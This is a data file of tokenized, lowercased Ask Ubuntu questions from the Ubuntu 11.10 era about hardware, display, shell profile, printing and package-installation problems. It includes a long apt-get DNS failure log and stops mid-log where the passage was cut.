97499	genesys logic , inc. usb 2.0 33-in-1 card reader ( internal )	i 've just plugged in a internal usb card reader genesys logic , inc. usb 2.0 33-in-1 card reader $ lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 05e3:0710 **genesys logic , inc. usb 2.0 33-in-1 card reader** bus 002 device 003 : id 090c:0203 feiya technology corp . bus 002 device 004 : id 15ca:00c3 textech international ltd. mini optical mouse bus 002 device 005 : id 413c:2003 dell computer corp . keyboard but when i plug in a card nothing happens . any thoughts ?
97503	how do i increase the font size in dash ?	i am a person with a visual impairment . pre-unity versions of ubuntu allowed you to change all font sizes . now the universal access feature is pretty much useless , as increasing font size to `` large '' increases everything but the application list in the unity dash , which is fixed at a size i can not see . thus , i see only icons and blurry small text , and there 's no way to know what apps i have . obviously , this is a major usability regression , and i believe something that should have been accounted for in the fundamental design of unity . if the dash font is hard-coded and will always be unalterable , i will have to use another de/ui , like kubuntu or something . furthermore , i ca n't believe this question has n't been asked before . it 's strange to include universal access with an os , but not be serious about its functionality . is there anything i can do to change the font size in dash ? i suppose that will require reorganizing the way the icons are displayed , showing less on each line , etc . i do n't know how to do this . or are there any plans to include a working universal access system in future versions of ubuntu ? or should i move on and look for a different distro ? any advice is welcome . thanks in advance ! the font size for the general interface ( windows , apps , etc . ) changes , but not the font size of the overlay ui in gnome-shell ( app labels under applications , etc . ) , nor in unity , where the dash ui app list font is fixed at a small size .
97504	extended desktop ( dual widescreen monitors )	i upgraded recently to ubuntu 11.10 from 10.04 . i have twin samsung 19 '' syncmasters that run natively on 1680x1050 , one to the dvi1 and one to the vga1 output of my fixed dual-head integrated intel graphics card ( 82g33/g31 ) . in i was able to use xrandr in 10.04 to set my desktop size to twice 1680x1050 ( 3360x1050 ) and put my dvi output to the right of the vga output . now the best i can do is mirror 1680x1050 , which is n't very helpful . i 've read somewhere that intel drivers now do n't support resolutions larger than 2048x2048 in either dimension . is there any way to get around this and get back to my initial set up ?
97505	package information was last updated 63 days ago , even though the ubuntu is up to date	i have been using ubuntu 11.10 . from couple of months i am getting package information was last updated 63 days ago , even though the ubuntu is up to date ; could anybody suggest a fix for this ?
97506	desktopcouches do n't pair	i 'm a rather advanced ubuntu user and i 'd like to develop things that will use desktopcouch , but i ca n't get started because the seemingly simple task of pairing two couches in my local network does n't work . when i look in the avahi browser i can see the couches and even the invitation listeners . as i understand the tool desktopcouch-pair i just have to start the invitation listening and i should be able to pair the couches . but nothing happens ... and to be honest , i do n't even understand how the couches will stay in sync when they are started using random ports each time . i hope i can get some explanation here .
97515	why i get non-symmetric usage of cpu on multicore pc	cpu : amd phenom ii x4 955 ubuntu 11.10 amd64 i launch some application that use only one core and when i look at cpu-load graphic in gnome-system-monitor i found that all of my four cpu 's loaded not symmetrically : most of all ( by time ) loaded cpu2 , then cpu1 , then cpu3 and cpu4 was loaded for 10sec only . cpu2 was loaded at 100 % for 3minutes without rest . when no application that uses a lot of cpu runing i also have cpu4 loaded lower than others . ubuntu try to kill my pc or it 's should be like this ?
97517	which release should i use for an acer aspire 1640 laptop ?	i have an acer aspire 1640 laptop with the following specs : processor : intel centrino 1.7 cache 2mb ram : 1 gb hard disk : 60 gb which ubuntu release should i use ? i am new to linux .
97520	crontab file is garbled ! help !	i accidentally deleted my .bashrc file in ubuntu 11.10 . i think i restored it but i have two major issues now : everything that i type has a red squiggly line under it in this field and the suggestion is a german word . my crontab file is completely garbled and looks like this : \00\00\00\00\00\00\00\00\00\00\00\00\00\008\00\00\00\00\00\008 @ \00\00\00\00\008 @ \00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00 @ \00\00\00\00\00\00\00 @ \00\00\00\00\00tw\00\00\00\00\00\00tw\00\00\00\00\00\00\00\00 \00\00\00\00\00\00\00\00\00\00\00 ( ~\00\00\00\00\00\00 ( ~\00\00\00\00\00 ( ~\00\00\00\00\00\00\00\00\00\00\00h\00\00\00\00\00\00\00\00 \00\00\00\00\00\00\00\00\00\00\00p~\00\00\00\00\00\00p~\00\00\00\00\00p~\00\00\00\00\00\90\00\00\00\00\00\00\90\00\00\00\00\00\00\00\00\00\00 help ! ! ! ! i am new at ubuntu and do n't know what to do . please do n't tell me to reinstall because i do n't know how to . i got this computer from system76 with ubuntu installed in it .
97522	how can my script determine whether it 's being run by bash or dash ?	i 'm running a fresh oneiric install ( i.e . not an upgrade ) on two different systems and running into the same set of seemingly related problems . the most frustrating of the bunch is that , when i use the .profile and .bashrc that i have carried with me from mac os x , logging in to x via lightdm logs me out immediately . i believe this is caused by the fact that , when running `` /bin/sh '' , it behaves as /bin/dash , but still has the $ shell variable set to /bin/bash . extrapolation i have a huge .bashrc . you can see it here if you want , but its contents are probably not relevant , aside from the fact that it 's full of bashisms , and the fact that it works with no errors inside xterm or on a virtual console . my .profile looks like this ( abbreviated ) : case $ shell in *bash* ) if [ -f $ home/.bashrc -a -r $ home/.bashrc ] ; then . $ home/.bashrc fi ; ; esac if i attempt to log in to x via lightdm , it will log me immediately back out . i get errors in .xsession-errors relating to my .bashrc that look like this ( abbreviated ) : /home/mrled/.bashrc : 103 : [ [ : not found [ : 103 : linux : unexpected operator [ : 274 : -p : : unexpected operator /home/mrled/.bashrc : 520 : complete : not found as i said , when i run bash from a virtual console , i do n't get these errors . furthermore , if i remove my .profile , i can log in to x just fine . ( i can also log in to a virtual console and use startx to initiate an x session that works , but this is of course not a long term solution . ) however , i discovered that if i run /bin/sh -l , i do get the errors . here 's an example session ( note : the bash prompt i have simplified to bash > , and the sh prompt is just $ ) : bash > echo $ shell /bin/bash bash > echo $ bash_version 4.2.10 ( 1 ) -release bash > /bin/sh -l /home/mrled/.bashrc : 103 : [ [ : not found [ : 103 : linux : unexpected operator [ : 274 : -p : : unexpected operator /home/mrled/.bashrc : 520 : complete : not found $ echo $ shell /bin/bash $ echo $ bash_version $ q1 : why is this happening ? i understand that /bin/sh now points to dash rather than bash , but if that 's true , then why is $ shell still returning /bin/bash ? q2 : what can i do to work around it ? is there a way to work around this ? i want to keep my profile loading .bashrc so that i get the same environment on both login and non-login shells , but obviously i only want it to load for bash itself , not /bin/sh masquerading as bash . you may have noticed the difference in the contents of the $ bash_version variables above . i have tried wrapping my .profile in something like this : if [ -n $ bash_version ] ; then # the rest of my .profile as above fi the -n test should return true only if the length of the string is non-zero , however , even though in the session above , when i 'm running under /bin/sh -l it returns an empty string for $ bash_version , when it 's included in my .profile like this , it passes the test ! it them proceeds to source my .bashrc and give me the same errors as before . now i 'm really confused .
97526	sound dies on wine games	i 've been playing some old classic games ( think 1999-2002 ) on wine on ubuntu 11.10 amd64 lately . the gameplay is great , but sound only works for a little while then crashes and does n't come back until i restart the game . log output from wine does n't show anything significant . is there a setting or a library i need to set to native in order to get things working ? how can i debug this and find out what the problem is so i can find a solution ?
97531	installing medibuntu fails	i 'm trying to install medibuntu following the instructions from medibuntu site , i paste in the terminal : sudo -e wget -- output-document=/etc/apt/sources.list.d/medibuntu.list http : //www.medibuntu.org/sources.list.d/ $ ( lsb_release -cs ) .list & & sudo apt-get -- quiet update & & sudo apt-get -- yes -- quiet -- allow-unauthenticated install medibuntu-keyring & & sudo apt-get -- quiet update it fails with : w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures could n't be verified because the public key is not available : no_pubkey 61260473f9d8bc54
97532	high contrast theme does n't show some icons on the launcher	i have lenovo r61 notebook . when i choose hightcontrast i can not see some icons including the setings icon on the left side bar . why ?
97540	set which pulseaudio sink is affected by volume control buttons	on my previous installation of ubuntu 10.04 it was possible to set a sink in pavucontrol , which is affected by the volume up-/down buttons on my keyboard . now in lubuntu 11.10 this does not work anymore . i can check the green tick , but this affects nothing , still always one and the same sink is affected . did anybody have this before ? where is this function configured - is there a config file , in which i could change this configuration directly ?
97542	how do i make my terminal display graphical pictures ?	this is a quick mockup i copy and pasted together . i imagine this being super cool and useful . does something like this exist already ?
97547	opengl and switchable graphic cards	i use a laptop and this laptop has readon amd radeon hd 6470m and onboad graphic card . when i run fglrxinfo , i get this error : x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 136 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 12 current serial number in output stream : 12 is it a problem ? because of i reason i ca n't use opengl . because , i ca n't run any opengl applications .
97549	added wireless printer for canon mg8150 no print is produced	on my new computer a 64 bits - i have a 64 bits ubuntu 11.10 installed . adding network printer with settings for a generic mg8100 printer : location : host-ip device uri : lpd : //host-ip/lpt5 model : canon pixma mg8100 - cups+gutenprint v5.2.7 simplified when i tried to make a test print this happen : ubuntu send a print to the printer the printer shows on the display that it is working ubuntu acknowledge with pop-up messages that print job was completed the printer stop working on the display and nothing happens , no print is produced there are no errors as far as i can see it . do anybody knows what to do , or what is wrong ? remarks on an old computer i have the ubuntu 11.10 32 bits installed and the same printer connected with `` device uri : cnijet : /88-87-17-08-64-56 '' and that works fine on this computer . i tried to used that instead of the lpd setting on the new computer but then i got a cups client error . i hope some body can help me with this .
97551	how do i get a canon selphy es1 printer working ?	my canon selphy es1 photo printer does not work with ubuntu 10.10 the printer is installed , and the print job is send to the printer , but nothing happens . please help !
97552	how to install dot provided by graphviz ?	how can install the package ? i have to do a test dot -tpng -o < path > < path > but while installing it fails . $ uname -a linux googleknockouter 2.6.38-8-generic # 42-ubuntu smp mon apr 11 03:31:24 utc 2011 x86_64 x86_64 x86_64 gnu/linux $ sudo apt-get install graphviz reading package lists ... done building dependency tree reading state information ... done suggested packages : graphviz-doc the following new packages will be installed : graphviz 0 upgraded , 1 newly installed , 0 to remove and 241 not upgraded . need to get 341 kb of archives . after this operation , 1,102 kb of additional disk space will be used . warning : the following packages can not be authenticated ! graphviz install these packages without verification [ y/n ] ? y err http : //us.archive.ubuntu.com/ubuntu/ natty/main graphviz amd64 2.26.3-5ubuntu1 something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.26.3-5ubuntu1_amd64.deb something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? $ sudo apt-get update ign http : //us.archive.ubuntu.com natty inrelease ign http : //us.archive.ubuntu.com natty-updates inrelease ign http : //security.ubuntu.com natty-security inrelease ign http : //extras.ubuntu.com natty inrelease err http : //us.archive.ubuntu.com natty release.gpg something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //security.ubuntu.com natty-security release.gpg something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //extras.ubuntu.com natty release.gpg something wicked happened resolving 'extras.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty-updates release.gpg something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) ign http : //security.ubuntu.com natty-security release ign http : //us.archive.ubuntu.com natty release ign http : //security.ubuntu.com natty-security/main sources/diffindex ign http : //extras.ubuntu.com natty release ign http : //us.archive.ubuntu.com natty-updates release ign http : //security.ubuntu.com natty-security/restricted sources/diffindex ign http : //security.ubuntu.com natty-security/universe sources/diffindex ign http : //security.ubuntu.com natty-security/multiverse sources/diffindex ign http : //security.ubuntu.com natty-security/main amd64 packages/diffindex ign http : //security.ubuntu.com natty-security/restricted amd64 packages/diffindex ign http : //security.ubuntu.com natty-security/universe amd64 packages/diffindex ign http : //security.ubuntu.com natty-security/multiverse amd64 packages/diffindex ign http : //security.ubuntu.com natty-security/main translationindex ign http : //security.ubuntu.com natty-security/multiverse translationindex ign http : //security.ubuntu.com natty-security/restricted translationindex ign http : //extras.ubuntu.com natty/main sources/diffindex ign http : //us.archive.ubuntu.com natty/main sources/diffindex ign http : //us.archive.ubuntu.com natty/restricted sources/diffindex ign http : //us.archive.ubuntu.com natty/universe sources/diffindex ign http : //us.archive.ubuntu.com natty/multiverse sources/diffindex ign http : //us.archive.ubuntu.com natty/main amd64 packages/diffindex ign http : //us.archive.ubuntu.com natty/restricted amd64 packages/diffindex ign http : //us.archive.ubuntu.com natty/universe amd64 packages/diffindex ign http : //us.archive.ubuntu.com natty/multiverse amd64 packages/diffindex ign http : //us.archive.ubuntu.com natty/main translationindex ign http : //us.archive.ubuntu.com natty/multiverse translationindex ign http : //security.ubuntu.com natty-security/universe translationindex ign http : //us.archive.ubuntu.com natty/restricted translationindex ign http : //us.archive.ubuntu.com natty/universe translationindex ign http : //us.archive.ubuntu.com natty-updates/main sources/diffindex ign http : //us.archive.ubuntu.com natty-updates/restricted sources/diffindex ign http : //us.archive.ubuntu.com natty-updates/universe sources/diffindex ign http : //us.archive.ubuntu.com natty-updates/multiverse sources/diffindex ign http : //us.archive.ubuntu.com natty-updates/main amd64 packages/diffindex ign http : //extras.ubuntu.com natty/main amd64 packages/diffindex ign http : //extras.ubuntu.com natty/main translationindex ign http : //us.archive.ubuntu.com natty-updates/restricted amd64 packages/diffindex ign http : //us.archive.ubuntu.com natty-updates/universe amd64 packages/diffindex ign http : //us.archive.ubuntu.com natty-updates/multiverse amd64 packages/diffindex ign http : //us.archive.ubuntu.com natty-updates/main translationindex ign http : //us.archive.ubuntu.com natty-updates/multiverse translationindex ign http : //us.archive.ubuntu.com natty-updates/restricted translationindex ign http : //us.archive.ubuntu.com natty-updates/universe translationindex err http : //extras.ubuntu.com natty/main sources something wicked happened resolving 'extras.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //extras.ubuntu.com natty/main amd64 packages something wicked happened resolving 'extras.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //extras.ubuntu.com natty/main translation-en_us something wicked happened resolving 'extras.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //extras.ubuntu.com natty/main translation-en something wicked happened resolving 'extras.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //security.ubuntu.com natty-security/main sources something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //security.ubuntu.com natty-security/restricted sources something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //security.ubuntu.com natty-security/universe sources something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //security.ubuntu.com natty-security/multiverse sources something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //security.ubuntu.com natty-security/main amd64 packages something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //security.ubuntu.com natty-security/restricted amd64 packages something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //security.ubuntu.com natty-security/universe amd64 packages something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //security.ubuntu.com natty-security/multiverse amd64 packages something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //security.ubuntu.com natty-security/main translation-en_us something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //security.ubuntu.com natty-security/main translation-en something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //security.ubuntu.com natty-security/multiverse translation-en_us something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //security.ubuntu.com natty-security/multiverse translation-en something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //security.ubuntu.com natty-security/restricted translation-en_us something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //security.ubuntu.com natty-security/restricted translation-en something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //security.ubuntu.com natty-security/universe translation-en_us something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //security.ubuntu.com natty-security/universe translation-en something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty/main sources something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty/restricted sources something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty/universe sources something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty/multiverse sources something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty/main amd64 packages something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty/restricted amd64 packages something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty/universe amd64 packages something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty/multiverse amd64 packages something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty/main translation-en_us something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty/main translation-en something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty/multiverse translation-en_us something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty/multiverse translation-en something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty/restricted translation-en_us something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty/restricted translation-en something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty/universe translation-en_us something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty/universe translation-en something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty-updates/main sources something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty-updates/restricted sources something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty-updates/universe sources something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty-updates/multiverse sources something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty-updates/main amd64 packages something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty-updates/restricted amd64 packages something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty-updates/universe amd64 packages something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty-updates/multiverse amd64 packages something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty-updates/main translation-en_us something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty-updates/main translation-en something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty-updates/multiverse translation-en_us something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty-updates/multiverse translation-en something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty-updates/restricted translation-en_us something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty-updates/restricted translation-en something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty-updates/universe translation-en_us something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.archive.ubuntu.com natty-updates/universe translation-en something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty/release.gpg something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/release.gpg something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/natty-security/release.gpg something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/release.gpg something wicked happened resolving 'extras.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/natty-security/main/source/sources something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/natty-security/restricted/source/sources something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/natty-security/universe/source/sources something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/natty-security/multiverse/source/sources something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/natty-security/main/binary-amd64/packages something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/natty-security/restricted/binary-amd64/packages something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/natty-security/universe/binary-amd64/packages something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/natty-security/multiverse/binary-amd64/packages something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/natty-security/main/i18n/translation-en_us something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/natty-security/main/i18n/translation-en something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/natty-security/multiverse/i18n/translation-en_us something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/natty-security/multiverse/i18n/translation-en something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/natty-security/restricted/i18n/translation-en_us something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/natty-security/restricted/i18n/translation-en something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/source/sources something wicked happened resolving 'extras.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty/main/source/sources something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty/restricted/source/sources something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty/universe/source/sources something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty/multiverse/source/sources something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty/main/binary-amd64/packages something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty/restricted/binary-amd64/packages something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty/universe/binary-amd64/packages something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty/multiverse/binary-amd64/packages something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty/main/i18n/translation-en_us something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty/main/i18n/translation-en something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty/multiverse/i18n/translation-en_us something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty/multiverse/i18n/translation-en something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/natty-security/universe/i18n/translation-en_us something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/natty-security/universe/i18n/translation-en something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty/restricted/i18n/translation-en_us something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty/restricted/i18n/translation-en something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty/universe/i18n/translation-en_us something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty/universe/i18n/translation-en something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/main/source/sources something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/restricted/source/sources something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/universe/source/sources something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/multiverse/source/sources something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/main/binary-amd64/packages something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/binary-amd64/packages something wicked happened resolving 'extras.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/i18n/translation-en_us something wicked happened resolving 'extras.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/i18n/translation-en something wicked happened resolving 'extras.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/restricted/binary-amd64/packages something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/universe/binary-amd64/packages something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/multiverse/binary-amd64/packages something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/main/i18n/translation-en_us something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/main/i18n/translation-en something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : 